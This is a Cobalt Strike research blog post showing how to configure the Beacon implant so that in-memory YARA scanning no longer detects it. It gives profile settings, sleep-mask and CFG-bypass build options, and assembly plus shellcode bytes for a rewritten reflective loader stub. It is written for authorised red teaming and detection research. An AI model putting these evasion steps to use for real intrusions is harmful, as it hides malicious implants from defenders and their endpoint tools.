Red Team Archives - Cobalt Strike Research and Development
fortra logo

Cobalt Strike and YARA: Can I Have Your Signature?

Over the past few years, there has been a massive proliferation of YARA signatures for Beacon. We know from conversations with our customers that this has become problematic when using Cobalt Strike for red team engagements and that there has been some confusion over how Cobalt Strike’s malleable C2 options can help.  
Therefore, this blog post will outline the OPSEC considerations when using Beacon with respect to in-memory YARA scanning and suggest a malleable C2 profile which should give robust evasion against these types of defensive techniques. 
As a TL;DR, to be OPSEC safe against in-memory YARA scanning you should: 

  • Ensure you are using the sleep mask and have enabled the evasive sleep found in the Arsenal kit (or alternatively use a modified/custom sleep mask) 
  • Enable stage.cleanup 
  • Strongly consider setting stage.obfuscate to true (or implement similar functionality in a UDRL) 
  • Be wary when using post-ex reflective DLLs (dependent on the security controls in place) as they currently fail to clean up memory and hence are ripe for signatures (we are working on fixing this) 

YARA Signatures

One of the quick wins for defenders when attempting to obtain detection coverage for a given malware family are YARA rules. Once a sample is obtained, signatures can be quickly generated and then deployed at scale. An excellent blog by Elastic on a methodology for doing this can be found here:  

Typically, these rules/signatures are made up of either strings found in the target binary or static bytes identified from reversing specific functionality (e.g. XOR/encryption routines etc.). Note that these rules can also be as simple as finding some arbitrary byte sequence that appears to be consistent between versions and that, say when run against Virus Total (e.g. via VTGrep:  content:{4D 5a etc..}), reliably identifies the target family. If this never changes between versions (unbeknownst to the operator), then it can provide a high-fidelity detection signature. 
This process becomes even more powerful when used in conjunction with in-memory scanning. Unless an implant takes evasive action, it is a sitting duck in memory (i.e. its .text / .data sections are plainly visible) and good YARA signatures will quickly identify it. Beacon in this sense is no different:

Furthermore, for Beacon specifically, there are countless open source (and no doubt many more private) YARA rules which are deployed by EDR vendors/threat hunters to quickly scan for and identify Beacons. As a result, this can make using Cobalt Strike a challenge for red team exercises unless extra precautions are taken. 

However, it is important to stress that low-cost detections are typically low cost to evade. YARA signatures generally can be thought of as having vast breadth but with limited depth (i.e. they are relatively quick and low cost to churn out/automate but have limited robustness for long term detection efficacy). With some basic adjustments to Beacon’s malleable C2 profile, it is possible to bypass YARA scanning with a high degree of confidence. Therefore, the aim of this blog post is to: 

  • Demonstrate Beacon’s susceptibility (in its default state) to YARA signatures. This will be illustrated initially via statically scanning a default Beacon payload on disk before considering in-memory YARA scanning.
  • Show how Cobalt Strike’s malleable C2 options can be configured to make in-memory YARA scanning redundant.  

As a note, this blog will primarily rely on Elastic’s open-source YARA rules for Cobalt Strike. This is because it was by far the most comprehensive collection of open-source YARA rules that we could find (and Elastic should be commended for being open and transparent in this regard). As such, this blog is not intended to be viewed as a guide in terms of how to “bypass” a specific vendor and it should be stressed that in-memory YARA scanning is likely to be only one component of a defence in depth strategy employed by EDRs (i.e. in conjunction with scanning for unbacked memory, anomalous threads, process injection, etc.). 

Lastly, it is important to note that as this blog is concerned with in-memory YARA scanning, all examples given are for raw Beacon DLL payloads. Hence, in this post we are assuming that Beacon has already been injected into memory via some form of Stage0 shellcode runner. Other payloads generated by Cobalt Strike (e.g. the default Cobalt Strike executables which are simple shellcode runners) have been included in the product for a number of years and as a result will be widely signatured too. However, they are out of scope for this blog post as the intention of the Arsenal kit is to facilitate modifying these executables to bypass signatures.

On-Disk YARA Scanning

To demonstrate the power of YARA signatures we can use Elastic’s open-source rules for Cobalt Strike and run them against a default raw HTTP Beacon DLL (on disk). As a note, this is a slightly contrived scenario, as typically when an exe/DLL is written to disk (or executed), an EDR will attempt to extract features and classify the binary via a PE malware model (although YARA could be used as well). This is a very different problem to get around and out of scope for this blog post, but see here for further reading. However, this first example is primarily designed to get an understanding of Beacon’s footprint in relation to YARA signatures before we consider the in-memory YARA scanning use case. 
We can run the Elastic Cobalt Strike YARA rules against a default raw Beacon DLL with the following command:

yara64.exe --print-strings Windows_Trojan_CobaltStrike.yar default_raw_beacon.dll

This generates five results:

1. Default strings found within Beacon.dll, as shown below (the corresponding YARA rule is Windows_Trojan_CobaltStrike_ee756db7):

Windows_Trojan_CobaltStrike_ee756db7 beacon_default_raw.dll

0x2cd60:$a39: %s as %s\%s: %d 
0x3c012:$a41: beacon.x64.dll 
0x2df70:$a46: %s (admin) 
0x2cec0:$a48: %s%s: %s 
0x2cd8c:$a50: %02d/%02d/%02d %02d:%02d:%02d 
0x2cdb8:$a50: %02d/%02d/%02d %02d:%02d:%02d 
0x2dfb9:$a51: Content-Length: %d

Strings are typically stored in the .data/.rdata section of a binary and clearly a number unique to Beacon are shown above.

2. An “unidentified” code fragment found within Beacon’s .text section (the corresponding YARA rule is Windows_Trojan_CobaltStrike_663fc95d):

Windows_Trojan_CobaltStrike_663fc95d beacon_default_raw.dll 

0x195f8:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00

3. A code fragment from Beacon’s default sleep mask routine (the corresponding YARA rule is Windows_Trojan_CobaltStrike_b54b94ac):

Windows_Trojan_CobaltStrike_b54b94ac beacon_default_raw.dll 

0x3c37b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03

Note that sleep mask was not actually enabled for this Beacon payload, however the default sleep mask is always patched in the .data section unless a custom one is specified.

4. A code fragment found within Beacon’s default exported reflective loader function (the corresponding YARA rule is Windows_Trojan_CobaltStrike_f0b627fc):

Windows_Trojan_CobaltStrike_f0b627fc beacon_default_raw.dll 

0x16ed2:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 
0x18183:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75

5. The reflective loader shellcode stub which is patched over the DOS header for Beacon (the corresponding YARA rule is Windows_Trojan_CobaltStrike_1787eef5):

Windows_Trojan_CobaltStrike_1787eef5 beacon_default_raw.dll 

0x0:$a5: 4D 5A 41 52 55 48 89 E5 48 81 EC 20 00 00 00 48 8D 1D EA FF FF FF 48 89 DF 48 81 C3 3C 6E 01 00

For the last two hits (4 and 5), it is important to understand that Beacon is a reflectively loaded DLL. This means it has an exported reflective loader function within its .text section. Furthermore, so that it can be run directly from memory, a small shellcode stub is written over the start of the DOS header.  This small shellcode stub is responsible for jumping to the exported reflective loader function, which will then proceed to bootstrap Beacon into memory. For more context on reflective loading, see our blog post series on UDRL development and @0xBoku’s excellent blog on ‘Defining the Cobalt Strike Reflective Loader’. 
Unsurprisingly, these two components are very attractive signatures for defenders (and have additionally remained static for a number of years). The fourth result above targets arbitrary code found within the default reflective loader function. The offending code within ReflectiveLoader() is shown in IDA below (25FFFFFF00 disassembles to `and eax, 0xFFFFFF` etc.):

Figure 1. A screenshot from IDA showing the code fragment within the exported reflective loader function which the Windows_Trojan_CobaltStrike_f0b627fc rule triggers on.

Here is a similar YARA rule by Google and note that Windows Defender also contains signatures for Beacon’s default reflective loader. We can demonstrate this by running ThreatCheck against the same raw payload:

Figure 2. ThreatCheck.exe identifying signatured bytes found within a raw Beacon payload.

If we scan for this byte sequence in IDA, we find that it is code located within the ReflectiveLoader function:

Figure 3. A screenshot from IDA showing that the bytes identified by ThreatCheck.exe belong to the exported reflective loader function.

The fifth result above (Windows_Trojan_CobaltStrike_1787eef5) is a signature for Beacon’s default shellcode stub for bootstrapping reflective loading. Beacon’s default shellcode stub is displayed in PE-Bear below:

Figure 4. A screenshot from PE-Bear showing the default Beacon shellcode stub that is written over the DOS header.

The Windows_Trojan_CobaltStrike_1787eef5 rule has one string condition ($a5) which is a fuzzy match for the first 8 bytes of this shellcode stub (` { 4D 5A 41 52 55 48 89 E5 48 81 EC ?? ?? ?? ?? 48 8D 1D ?? ?? ?? ?? 48 89 DF 48 81 C3 ?? ?? ?? ?? }`).

In-Memory YARA Scanning

Having looked at Beacon’s exposure to YARA for a default raw DLL payload located on disk, we can now turn to the problem this blog is concerned with: in-memory YARA scanning.  

The critical thing to understand with respect to in-memory YARA scanning is that when Beacon is reflectively loaded into memory it results in two memory allocations: the raw Beacon DLL (which will actually execute the shellcode stub and reflective loader function) and the virtual Beacon DLL (which is correctly loaded in memory and ready to go). Hence, the raw Beacon DLL will actually allocate memory (via the reflective loader function) for the virtual Beacon DLL and ensure it is correctly loaded. This is demonstrated in the image below:

Figure 5. A diagram showing the two memory allocations which occur as a result of the reflective loading process for a default Beacon payload. The first is Beacon in its raw/packed file format (‘Raw Beacon DLL’) and the second is Beacon after it has been correctly loaded into memory (‘Virtual Beacon DLL’).

Some of Cobalt Strike’s malleable C2 options patch/modify the raw Beacon DLL (i.e. stage.magic_mz_x64) whereas some change the behaviour of the reflective loader/how Beacon is loaded into memory (i.e. stage.obfuscate will not copy over the DLL headers to the virtual Beacon DLL, stage.stomp_pe will stomp values in the virtual Beacon DLL headers etc..). The important point to stress is that depending on what malleable C2 options are set, these two memory allocations may trigger different YARA signatures and hence both need to be accounted for. 
It is clear from the diagram above that, in its default state, Beacon is a sitting duck once it has been injected into memory. It’s reflective loader stub, code (.text section), and strings (.rdata/data) are all clearly visible. This is demonstrated in the screenshot from Windbg below, which shows strings belonging to Beacon lurking in plain text in a memory region corresponding to the virtual Beacon DLL (RWX):

Figure 6. A screenshot from Windbg showing suspicious strings in memory belonging to the virtual Beacon DLL. These would trivially be found by in-memory YARA scanning.

Furthermore, because of the two allocations corresponding to the raw and virtual DLL, all these sensitive regions are actually stored in memory twice. Hence, if we run the same set of YARA rules against a process that has a default Beacon injected into it, we will get the same YARA hits as before except this time there will be duplicates. These duplicate results will correspond to the same strings/bytes being found within the raw Beacon DLL and the virtual Beacon DLL. 
The screenshot below from Windbg shows the two suspicious memory regions (corresponding to the raw Beacon DLL and the virtual Beacon DLL) which are a result of Beacon being injected into memory. These are both identifiable via the same DLL header (MZARUH..) which is the start of the default reflective loader stub.

Figure 7. A screenshot from Windbg showing the two memory regions which result from reflectively loading a default Beacon payload. The RWX memory region corresponds to the virtual Beacon DLL and the RX region corresponds to the raw Beacon DLL.

The image below shows the output of running YARA against this process memory address space (PID 3204). Notice that we get two hits for each rule, which correspond to the two memory regions highlighted above in Windbg:

Figure 8. The results of running the Elastic Cobalt Strike YARA rules against a process with a default Beacon injected into it. As by default, Beacon is written in memory twice (raw Beacon DLL and virtual Beacon DLL), we get duplicate results for each triggering YARA rule.

Lastly, once Beacon is up and running, also be aware that its run time behaviour can increase its in-memory footprint. A good example to demonstrate this is BeaconEye. This uses the following signatures ( to identify Beacon via scanning for its configuration in heap memory.

YARA OPSEC Considerations for Beacon

The examples above demonstrate that, in its default state, there is an extremely low barrier to detecting Beacon in memory via YARA scanning. Furthermore, there are a multitude of YARA signatures targeting different sections of the Beacon DLL, i.e. the reflective loader stub/DLL Headers, code fragments found within the .text section, strings found in its data sections and so on. This is obviously something as operators that we need to address and at this point we can start to explore how to configure Beacon’s malleable C2 options so that we can bypass this entire class of detections.


As a basic ‘evasion in depth’ approach it is always sensible to remove obviously suspicious strings found within Beacon’s reflective DLL (“beacon.x64.dll”, “ReflectiveLoader”, etc..). We can do this with the strrep command, which will replace a string/set of bytes within Beacon’s reflective DLL. However, note that some strings identified by YARA above are Beacon format strings (“%s%s: %s”) that are currently required to return data and so replacing these may cause undefined behaviour. 
As a demonstration of how brittle YARA signatures can be though, we can make some minor modifications to our malleable C2 profile to bypass the Windows_Trojan_CobaltStrike_ee756db7 rule that identifies default strings found within Beacon. This rule requires six suspicious strings to be identified, as the excerpt below shows:

        $a50 = "%02d/%02d/%02d %02d:%02d:%02d" ascii fullword
        $a51 = "Content-Length: %d" ascii fullword
        6 of ($a*)

By making the following modification to our malleable C2 profile we can bypass this rule:

stage { 
    Transform-x64 { 
        strrep "(admin)" "(adm)";
        # If you modify these ensure you keep format string order
        strrep "%s as %s\\%s: %d" "%s - %s\\%s: %d";

Generally though, as we can’t modify all of these default strings without causing issues, the real solution to suspicious strings is to use the sleep mask kit (which we will discuss shortly).

Stage.magic_mz_* / Stage.magic_pe_*

The ‘magic_mz_*’ / ‘magic_pe_*’ options patch the MZ and PE characters respectively in Beacon’s raw DLL. The exported reflective loader function will use these magic bytes to locate itself in memory, so this option will also modify the reflective loader. Note that as these are located in the DLL headers, they will be copied over to the virtual Beacon DLL during the reflective loading process.

As a word of caution, for the magic_mz_* option, the value provided must be valid (no-)op codes as they are the first instructions that will be executed as part of the shellcode stub. Typically, this would be some variant of `pop regA, push regA` as the latter instruction undoes the first, but see here for more guidance on configuring this option. 
These options are typically used to frustrate memory scanners trying to identify injected DLLs, however magic_mz could be used to break basic YARA signatures on the reflective loader stub. As an example, modifying the MZ bytes (4D 5A) would break this signature. However, our freedom of movement is limited as we can only modify a few bytes in each case, so clearly more robust YARA signatures would still trigger.


This is a key option and should be set to true wherever possible. As we have previously demonstrated, the initial memory allocation of the raw Beacon DLL contains several highly signaturable components (i.e. reflective loader stub, exported reflective loader function etc..).  Furthermore, once it has bootstrapped Beacon it is no longer needed. By setting the ‘cleanup’ option to true, Beacon will free this memory and dramatically lower its in-memory footprint (hence only the virtual Beacon DLL will remain). Additionally, the clean-up operation is smart enough to identify how the memory was allocated initially and free it accordingly. 
Note that if for some reason you cannot use cleanup, this BOF by @S4ntiagoP demonstrates how you can manually clean up memory.


Even if we have set cleanup to true, the DLL headers are still copied over to the virtual Beacon DLL and hence a target for in-memory scanning. The stomppe option will ensure the MZ/PE and e_lfanew values are stomped in the virtual Beacon DLL during the reflective loading process. This means it is again harder for memory scanners to identify if there is an injected DLL in memory but could also help break any YARA signatures targeting Beacon’s DOS header (although this option is similar to magic_mz/pe in that is has limited freedom of movement for the YARA use case).


We can go one better and ask the reflective loader to copy Beacon over without its DLL headers. This can be achieved with the ‘stage.obfuscate’ flag. Enabling this, along with cleanup, means the reflective loader stub can no longer be found in-memory. 
Additionally, stage.obfuscate will also mask Beacon’s: 

  • .text section 
  • Section names 
  • Import table 
  • Dos/Rich Header (this is technically not masked but overwritten with random data)

As of 4.8, stage.obfuscate moved from a fixed single byte XOR key to a randomly generated multi-byte XOR key. This is particularly useful from an evasion perspective because YARA contains a xor modifier which will brute force single byte XOR’d strings. As an example, here is a YARA rule which looks for XOR’d strings in Beacon. 

Stage.obfuscate is demonstrated in the screenshot from PE-Bear below, which compares a default Beacon to one with obfuscation enabled (notice the different DOS headers and masked/XOR’d section names): 

Figure 9. A screenshot from PE-Bear showing a comparison of an obfuscated Beacon DLL vs a default Beacon DLL.

The required sections will then be unmasked during the reflective loading process. Hence this will break some YARA signatures on the raw/static Beacon DLL, but not once it has been loaded into memory (i.e. rules for code fragments in the .text section will still hit on the virtual Beacon DLL). This is demonstrated (at a high level) below:

Figure 10. A diagram showing the two memory allocations which occur as a result of the reflective loading process for an obfuscated Beacon payload. Note, that as well as the masking on the raw Beacon DLL, the Virtual Beacon DLL does not have any DLL headers.

Also note that, as this diagram suggests, some things are still not masked in the raw Beacon DLL even when obfuscate is enabled: 

  • Reflective loader stub 
  • Exported reflective loader function 
  • Sleep mask 
  • Strings 

Hence, even an obfuscated Beacon payload will still trigger the same YARA rules identified previously for each of these respective components. One way to address this limitation is via implementing custom obfuscation in a UDRL. This topic will be covered in much more detail in the next part of our UDRL development blog series
Lastly, also bear in mind that the obfuscation applied to Beacon might make it look (more) suspicious to PE malware models if dropped to disk (i.e. the sketchy section names, higher entropy of some sections, etc. will all make it look more anomalous).

Modifying The Reflective Loader Stub

It should be clear by now that the default Cobalt Strike reflective loader stub is an obvious target for YARA signatures. However, it is possible to create our own DOS stub and apply it to Beacon payloads via the `stage.transform` block. Note that this example will only consider X64 payloads. 
The default 64 bit DOS stub used by Beacon is shown (and explained) below:

pop r10                ; MZ Header 
push r10               ; undo action above 
push rbp               ; save the stack base pointer 
mov rbp, rsp           ; create a new stack frame 
sub rsp, 0x20          ; create shadow space (x64 __fastcall) 
lea rbx, [rip - 0x16]  ; obtain shellcode base address 
mov rdi, rbx           ; save shellcode base address 
add rbx, 0x16EA4       ; add file offset of ReflectiveLoader to shellcode base 
call rbx               ; call ReflectiveLoader (returns DllMain address) 
mov r8d, 0X56A2B5F0    ; EXITFUNC value 
push 4                 ; push 4 to stack 
pop rdx                ; pop the value into rdx (second argument of call) 
mov rcx, rdi           ; move shellcode base address to rcx (first argument of call) 
call rax               ; call DllMain 

The following example is an alternate version of the stub described above:

pop r10               ; MZ Header 
lea rbx, [rip -0x08]  ; obtain the shellcode base address 
push r10              ; undo action of MZ header 
sub rsp, 0x28         ; create shadow space and align stack 
mov rdi, rbx          ; save shellcode base address 
add rbx, 0xb752       ; add half file offset of ReflectiveLoader to shellcode base  
add rbx, 0xb752       ; add half file offset of ReflectiveLoader to shellcode base 
call rbx              ; call ReflectiveLoader (returns DllMain address) 
mov rdx, 0x04         ; move 4 into rdx (second argument of call) 
mov rcx, rdi          ; move shellcode base address to rcx (first argument of call) 
call rax              ; call DllMain 

Note that the default ReflectiveLoader will actually call DllMain itself and return the address of DllMain to the shellcode stub. We then call DllMain a second time to start Beacon. This is why you may see two calls to DllMain in open source UDRLs. 
This stub performs similar steps but with some instruction substitution and in a slightly different order (with the exception of setting the EXITFUNC value which is not actually technically required). Furthermore, there are many other ways of using instruction substitution to achieve a similar effect. For example, every `mov regA, regB` could be substituted as `push regB; pop regA` or `mov tmp, regB; mov regA, tmp` etc. Alternatively, a more automated approach could be to use something like Nettitude’s Shellcode Mutator. This does not actually mutate instructions per se (it randomly adds in no-ops to existing shellcode) but it could also be used to break YARA signatures. 
In the screenshot below, we’ve used to assemble the alternate shellcode stub above:

Figure 11. A screenshot from showing the assembled code of our modified shellcode stub which will overwrite the DOS header.

As a note, for complicated instruction encoding reasons, `pop r10` actually assembles to 41 5A, so you will need to manually change “\x41\x5A” back to “\x4D\x5A” at the start of the string literal (4D 5A still disassembles as `pop r10`). This is because the default reflective loader hunts backwards for the MZ header (i.e. 4D 5A) and so will fail if it can’t find it.  
It is possible to modify the default DOS stub and use our updated version with strrep in the malleable C2 profile, as demonstrated below:

stage { 
     transform-x64 { 
          strrep                  "\x4D\x5A\x41\x52\x55\x48\x89\xE5\x48\x81\xEC\x20\x00\x00\x00\x48\x8D\x1D\xEA\xFF\xFF\xFF\x48\x89\xDF\x48\x81\xC3\xA4\x6E\x01\x00\xFF\xD3\x41\xB8\xF0\xB5\xA2\x56\x68\x04\x00\x00\x00\x5A\x48\x89\xF9\xFF\xD0" "\x4D\x5A\x48\x8D\x1D\xF8\xFF\xFF\xFF\x41\x52\x48\x83\xEC\x28\x48\x89\xDF\x48\x81\xC3\x52\xB7\x00\x00\x48\x81\xC3\x52\xB7\x00\x00\xFF\xD3\x48\xC7\xC2\x04\x00\x00\x00\x48\x89\xF9\xFF\xD0"; 

After restarting the Teamserver with the above strrep included within our profile, we can see that the new DOS stub has been applied to our exported Beacon payload:

Figure 12. A side by side comparison of the default Beacon shellcode stub (on the left) vs our modified shellcode stub (on the right) for an exported raw Beacon payload.

In the screenshot below, we have used (from the udrl-vs kit) to inject the raw Beacon payload (i.e. beacon.bin) with the modified DOS header into memory to test that it works as expected:

Figure 13. An example using (located in the udrl-vs kit) to execute our raw Beacon DLL with the modified DOS header to confirm it works as expected.

As a note, to be compatible with the default reflective loader, the reflective loader stub needs to do four things: 
1. Obtain the shellcode base address (i.e. start of the MZ header). 
2. Calculate the offset to the exported ReflectiveLoader function from the shellcode base. 
3. Call ReflectiveLoader(). 
4. Call DllMain with the shellcode base address as the hinstDLL parameter (first argument/rcx) and 4 as the reason code parameter (second argument/rdx). Note that the third argument isn’t required. 
As long as you perform these steps, you can add whatever code you like to get Beacon up and running. However, you should try and restrict the size of the shellcode stub to 59 bytes or else you may crash Beacon. This is because after this point you will overwrite the value of e_lfanew (which is located at 0x3C/60 in the DOS header). The value of e_lfanew is required by the reflective loader to hunt backwards in memory for the MZ & PE headers and so if you blitz this it will fail. 
Lastly, as the magic_mz option also modifies the start of the DOS stub (and in turn what bytes the reflective loader looks for) it is incompatible with (and will supersede) the strrep approach outlined here. 

Sleep Mask

Even with all the modifications above, Beacon is still vulnerable to YARA rules targeting the .text/.data sections, as these are all still plainly visible in memory. Furthermore, Beacon’s run time data is similarly exposed (i.e. heap memory).  

The solution to this problem in Cobalt Strike is the sleep mask. The concept of this is simple: before Beacon sleeps, it will mask itself and any related memory (i.e. on the heap). When Beacon checks in it will briefly be exposed, however most of the time its memory will be masked and hence any valid signatures will fail to find their target. This is the key malleable C2 option to be configured. It will ensure that Beacon is only visible in memory for an extremely short window and will provide the most robust defence against in-memory signatures.

Enabling The Sleep Mask

One thing to bear in mind is that there are some extra steps required to make the sleep mask kit correctly mask the .text section when stage.userwx is set to false. While not strictly related to YARA scanning, it is generally always advised to avoid RWX memory (i.e. set userwx : false) as this is an obvious indicator of code injection and low hanging fruit for memory scanners. Hence, we recommend taking these extra steps to enable both settings. 

Prior to 4.7, sleep mask would only mask the .text section if it was RWX. Hence, if stage.userwx was set to false, Beacon’s .text section would reside in RX memory and would not be masked. The .text section is therefore at risk of trivial detection by the many YARA rules previously discussed and so this is not ideal. 

As of 4.7, we can configure the sleep mask kit to mask the .text section when stage.userwx is set to false. When this is enabled the sleep mask will change the .text protection to RW, mask the section, sleep, unmask the section, and then change the .text protection back to RX.  
To enable this, we need to set the following options in the stage block for our malleable C2 profile:

set userwx "false";
set sleepmask "true";

After setting these values and restarting the TeamServer, run the build script found within the sleep mask kit. As of the latest version of the Arsenal Kit (20230315), this is performed via the following (example) command:

./ 47 WaitForSingleObject true indirect /tmp/dst

For a full explanation of each parameter, you can run ./ with no arguments. However, the key parameter related to this discussion is to set the third argument (Mask_text) to ‘true’. After recompiling, load the subsequent .cna script into the Script Manager. For further guidance, see the README found in the sleep mask kit.

As a note, for older versions of the sleep mask kit you will need to set MASK_TEXT_SECTION to 1 in sleepmask.c as demonstrated below:

/* Enable or Disable sleep mask capabilities */

Evasive Sleep Mask

At this point, Beacon will now avoid RWX memory, will not copy over its DLL headers, and will mask itself when sleeping. However, there is one weak link in this approach: the sleep mask itself is still present/exposed in memory. This is shown at a high level below:

Figure 14. A high level diagram showing the memory exposure of Beacon once the sleep mask has been enabled. Beacon itself is now masked, however the default sleep mask is visible in memory and vulnerable to YARA signatures.

The default sleep mask is therefore again a very attractive target for defenders and no surprises that there are plenty of rules which focus on this remaining in-memory footprint. For example, with both cleanup and sleep mask enabled, the Windows_Trojan_CobaltStrike_b54b94ac rule for the default sleep mask will trigger when Beacon is sleeping as demonstrated below:

Figure 15. The results of running the Elastic Cobalt Strike YARA rules against a process with Beacon injected and using the default sleep mask. Now Beacon is masked, we no longer get any hits for rules targeting code/strings within Beacon, however we do get a YARA hit for a code fragment corresponding to the default sleep mask.

This screenshot shows the call stack for the sleeping Beacon thread (tid: 900) and the results of running the same YARA rules against this process (pid: 5944). Now that Beacon is masked, the YARA rules that we identified before will no longer trigger, however we do see the expected hit for the default sleep mask (Windows_Trojan_CobaltStrike_b54b94ac). Note that we can see that this result was found in the same region of memory as the highlighted unbacked return address in the sleeping thread’s call stack (~0x1b4ef8c00d2). Therefore, even if you’re using Beacon with the default sleep mask, you’re still at risk of being trivially identified via in-memory YARA scanning. 

Clearly then, we also need to obfuscate the sleep mask memory while Beacon sleeps. We can do this by using the evasive sleep mask found in the Arsenal kit. This will use an external mechanism to scramble the sleep mask when sleeping and hence will break any signatures on itself as shown in the diagram below:

Figure 16. A high level diagram showing the memory exposure of Beacon once the evasive sleep mask has been enabled. Both Beacon and the sleep mask are now obfuscated so no YARA rules will fire.

This can be configured by setting the below in sleepmask.c:

#if _WIN64

Also note that to avoid any issues when using the evasive sleep (especially with process injection), ensure that you enable the CFG bypass by modifying evasive_sleep.c to the below:

 *   Enable the CFG bypass technique which is needed to inject into processes
 *   protected Control Flow Guard (CFG) on supported version of Windows.
#define CFG_BYPASS 1

Once these two steps have been completed, you can once again rebuild and reload the .cna script for the changes to take effect. 
Alternatively, you could modify the default sleep mask and recompile it to break any static byte patterns or apply your own user-defined sleep mask (UDSM). Generally, customisation is king for both the sleep mask and reflective loading (see the UDRLs section below) and using custom / unknown code will obviously completely break pre-canned YARA signatures.


This post has demonstrated that there are numerous signatures for Beacon’s default reflective loader function. With the sleep mask, evasive sleep, and cleanup all enabled, a default reflective loader is less of an issue as our in-memory exposure is extremely limited. However, to avoid default YARA signatures you could consider using a custom UDRL. Our own blog series provides a guide on how to develop UDRLs and there are many excellent open-source UDRLs such as BokuLdr, TitanLdr, and AceLdr
Note that if you do use a custom UDRL, many of the malleable C2 options outlined above are ignored. This is because how you modify/obfuscate Beacon is coupled with how the reflective loader works. For example, if you obfuscate a section, your reflective loader needs to know how to de-obfuscate it. Hence, it makes sense to leave these details to the UDRL developer to implement.

Post-Ex Reflective DLLs

There is a caveat to the approach suggested so far and that is in respect to post-ex reflective DLLs. As a note, not all post-ex functionality is run as a reflective DLL and many are implemented as BOFs; see the following documentation for a complete guide. 

If we run the same set of YARA rules against a process which has had the Cobalt Strike keylogger injected into it, we get two hits:

1. Default strings found in the keylogger post-ex DLL (the corresponding YARA rule is Windows_Trojan_CobaltStrike_0b58325e):

Windows_Trojan_CobaltStrike_0b58325e 9540 

0x14767a91d42:$a2: keylogger.x64.dll 
0x14767cb2b42:$a2: keylogger.x64.dll 
0x14767a8b568:$a4: %cE=======%c 
0x14767cac368:$a4: %cE=======%c 
0x14767a8b908:$a5: [unknown: %02X] 
0x14767cac708:$a5: [unknown: %02X] 
0x14767a91d54:$b1: ReflectiveLoader 
0x14767cb2b54:$b1: ReflectiveLoader 
0x14767a8b578:$b2: %c2%s%c 
0x14767cac378:$b2: %c2%s%c 
0x14767a8b8c0:$b3: [numlock] 
0x14767cac6c0:$b3: [numlock] 
0x14767a8b562:$b4: %cC%s 
0x14767cac362:$b4: %cC%s 
0x14767a8b658:$b5: [backspace] 
0x14767cac458:$b5: [backspace] 
0x14767a8b8d0:$b6: [scroll lock] 
0x14767cac6d0:$b6: [scroll lock] 
0x14767a8b688:$b7: [control] 
0x14767cac488:$b7: [control] 
0x14767a8b6f4:$b8: [left] 
0x14767cac4f4:$b8: [left] 
0x14767a8b6c8:$b9: [page up] 
0x14767cac4c8:$b9: [page up] 
0x14767a8b6d8:$b10: [page down] 
0x14767cac4d8:$b10: [page down] 
0x14767a8b718:$b11: [prtscr] 
0x14767cac518:$b11: [prtscr] 
0x14767a8b8e0:$b13: [ctrl] 
0x14767cac6e0:$b13: [ctrl] 
0x14767a8b6ec:$b14: [home] 
0x14767cac4ec:$b14: [home] 
0x14767a8b6a0:$b15: [pause] 
0x14767cac4a0:$b15: [pause] 
0x14767a8b670:$b16: [clear] 
0x14767cac470:$b16: [clear]

2. The reflective loader stub (the corresponding YARA rule is Windows_Trojan_CobaltStrike_29374056):

Windows_Trojan_CobaltStrike_29374056 9540 

0x14767a80000:$a1: 4D 5A 41 52 55 48 89 E5 48 81 EC 20 00 00 00 48 8D 1D EA FF FF FF 48 81 C3 10 19 00 00 FF D3 
0x14767ca0000:$a1: 4D 5A 41 52 55 48 89 E5 48 81 EC 20 00 00 00 48 8D 1D EA FF FF FF 48 81 C3 10 19 00 00 FF D3

Once again we get duplicate results which correspond to the same rules flagging on both the raw post-ex DLL and the virtual post-ex DLL.
The main malleable C2 option we have to play with for post-ex DLLs is setting ‘post-ex.obfuscate’ to true. This option will: 

  • Statically mask the rdata/data sections 
  • Scrub module/function name strings 
  • Dynamically mask the rdata section at run time for long running tasks (this behaviour will vary between different post-ex DLLs) 
  • Not copy over the DLL headers during reflective loading 
  • Avoid RWX memory (hence if you don’t set this option, post-ex DLLs will use RWX memory) 

Therefore, after enabling post-ex.obfuscate, we are left with a single hit for the reflective loader stub from the raw post-ex DLL (Windows_Trojan_CobaltStrike_29374056). This is because the DLL headers were not copied over to the virtual post-ex DLL and the previously identified strings are now masked in both the raw and virtual DLLs:

Figure 17. The results of running the Elastic Cobalt Strike YARA rules against a process hosting the Cobalt Strike keylogger with post-ex.obfuscate enabled.

Furthermore, once the keylogger job is killed, we still get this result. In fact, neither memory allocations are cleaned up and will remain in memory until the process terminates. Note that the obfuscate flag means that the strings in rdata will be cleared when the post-ex DLL thread exits, however the memory is not freed.  

Hence, post-ex reflective DLLs do not properly clean up memory and so are a real risk of triggering trivial YARA signatures. As a caveat, there will be differences in behaviour for different post-ex reflective DLLs which are not covered in detail here, but the key take away is that all of them have this limitation currently. 
This is not a risk if you fork and run (which can be noisy) but will be if used either intra-process or for a long running job injected into a separate process. Therefore, be wary when using post-ex reflective DLLs, even with obfuscate enabled, if you know the security controls in place involve in-memory YARA scanning and prefer BOF equivalents where possible. This limitation for post-ex DLLs is something we are planning to overhaul in the 4.9 release.


With the suggested approach outlined in this blog, Beacon is now robust against in-memory YARA scanning. It will be masked in memory for all but an extremely brief check in time and when it is visible we have taken as many precautions as possible to limit its exposure. 
Our suggested malleable C2 profile therefore looks something like the below:

stage {
     set userwx "false";
     set cleanup "true";
     set obfuscate "true";

     set magic_mz_x64 "<CHANGEME>"; 
     set magic_pe "<CHANGEME>";
     # Alternatively, modify the DOS header via the
     # transform.strrep approach outlined previously. 

     # For sleep mask ensure you:
     # - Enable masking the text section (set Mask_text to true 
     #   for./ or for older sleep mask kits set 
     #   MASK_TEXT_SECTION to 1 in sleepmask.c).
     # - Enable evasive sleep (#define EVASIVE SLEEP 1 in sleepmask.c).
     # - Enable CFG bypass (#define CFG_BYPASS 1 in evasive_sleep.c).
     # - Ensure sleep mask is recompiled after setting the above
     #   and that the .cna script is loaded into the Script Manager.
     set sleep_mask "true";

     # Remove default strings found in Beacon.
     transform-x64 {
          strrep "ReflectiveLoader" "<CHANGEME>";
